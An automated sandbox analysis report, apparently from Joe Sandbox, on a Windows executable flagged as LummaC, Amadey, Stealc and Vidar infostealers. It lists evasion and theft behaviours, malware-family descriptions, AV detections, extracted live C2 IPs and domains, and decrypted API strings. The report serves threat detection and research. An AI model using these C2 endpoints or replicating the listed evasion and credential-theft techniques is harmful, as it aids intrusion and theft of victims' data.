Windows Analysis Report
ElmEHL9kP9.exe

Overview

General Information

Sample name: ElmEHL9kP9.exe
renamed because original name is a hash value
Original sample name: 2b6d71bf9628fb892f3b29e8ba249e58.exe
Analysis ID: 1580274
MD5: 2b6d71bf9628fb892f3b29e8ba249e58
SHA1: 24d17185d16e2236c4699d397d3cf0f78d7665b9
SHA256: 43197dc24b40cb5775140fc85a626b11e3aa63f4a00ff85409d30e55554e2fe1
Tags: exeuser-abuse_ch
Infos:

Detection

LummaC, Amadey, LummaC Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Drops PE files to the document folder of the user
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
Monitors registry run keys for changes
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SIDT)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

barindex
Source: ElmEHL9kP9.exe Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.phpaf9748e8b0bdf623d35f52a86479nsion Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllX Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php:F Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dllD Avira URL Cloud: Label: malware
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000014.00000002.2562867603.0000000000E51000.00000040.00000001.01000000.00000011.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000006.00000002.2484458829.000000000132E000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: ElmEHL9kP9.exe.6272.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["observerfry.lat", "shapestickyr.lat", "manyrestro.lat", "talkynicer.lat", "bashfulacid.lat", "curverpluch.lat", "tentabatte.lat", "slipperyloo.lat", "wordyfindy.lat"], "Build id": "PsFKDg--pablo"}
Source: ElmEHL9kP9.exe Virustotal: Detection: 34% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: ElmEHL9kP9.exe Joe Sandbox ML: detected
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: 07
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: 01
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: 20
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: 25
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetProcAddress
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: LoadLibraryA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: lstrcatA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: OpenEventA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: CreateEventA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: CloseHandle
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Sleep
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetUserDefaultLangID
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: VirtualAllocExNuma
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: VirtualFree
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetSystemInfo
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: VirtualAlloc
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: HeapAlloc
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetComputerNameA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: lstrcpyA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetProcessHeap
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetCurrentProcess
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: lstrlenA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: ExitProcess
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetSystemTime
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: SystemTimeToFileTime
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: advapi32.dll
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: gdi32.dll
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: user32.dll
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: crypt32.dll
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetUserNameA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: CreateDCA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetDeviceCaps
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: ReleaseDC
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: CryptStringToBinaryA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: sscanf
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: VMwareVMware
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: HAL9TH
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: JohnDoe
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: DISPLAY
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: %hu/%hu/%hu
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: http://185.215.113.206
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: /c4becf79229cb002.php
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: /68b591d6548ec281/
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: stok
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetFileAttributesA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: HeapFree
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetFileSize
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GlobalSize
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: IsWow64Process
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Process32Next
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetLocalTime
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: FreeLibrary
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetTimeZoneInformation
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetSystemPowerStatus
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetVolumeInformationA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Process32First
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetLocaleInfoA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetModuleFileNameA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: DeleteFileA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: FindNextFileA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: LocalFree
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: FindClose
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: LocalAlloc
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetFileSizeEx
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: ReadFile
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: SetFilePointer
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: WriteFile
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: CreateFileA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: FindFirstFileA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: CopyFileA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: VirtualProtect
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetLastError
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: lstrcpynA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: MultiByteToWideChar
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GlobalFree
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: WideCharToMultiByte
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GlobalAlloc
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: OpenProcess
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: TerminateProcess
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetCurrentProcessId
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: gdiplus.dll
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: ole32.dll
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: bcrypt.dll
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: wininet.dll
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: shlwapi.dll
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: shell32.dll
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: rstrtmgr.dll
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: SelectObject
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: BitBlt
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: DeleteObject
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: CreateCompatibleDC
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GdipGetImageEncoders
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GdiplusStartup
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GdiplusShutdown
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GdipSaveImageToStream
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GdipDisposeImage
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GdipFree
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetHGlobalFromStream
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: CoUninitialize
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: CoInitialize
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: CoCreateInstance
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: BCryptDecrypt
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: BCryptSetProperty
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: BCryptDestroyKey
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetWindowRect
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetDesktopWindow
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetDC
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: CloseWindow
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: wsprintfA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: CharToOemW
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: wsprintfW
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: RegQueryValueExA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: RegEnumKeyExA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: RegOpenKeyExA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: RegCloseKey
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: RegEnumValueA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: CryptBinaryToStringA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: CryptUnprotectData
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: SHGetFolderPathA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: ShellExecuteExA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: InternetOpenUrlA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: InternetConnectA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: InternetCloseHandle
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: HttpSendRequestA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: HttpOpenRequestA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: InternetReadFile
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: InternetCrackUrlA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: StrCmpCA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: StrStrA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: StrCmpCW
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: PathMatchSpecA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: GetModuleFileNameExA
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: RmStartSession
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: RmRegisterResources
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: RmGetList
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: RmEndSession
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: sqlite3_open
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: sqlite3_step
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: sqlite3_column_text
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: sqlite3_finalize
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: sqlite3_close
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: sqlite3_column_bytes
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: sqlite3_column_blob
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: encrypted_key
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: PATH
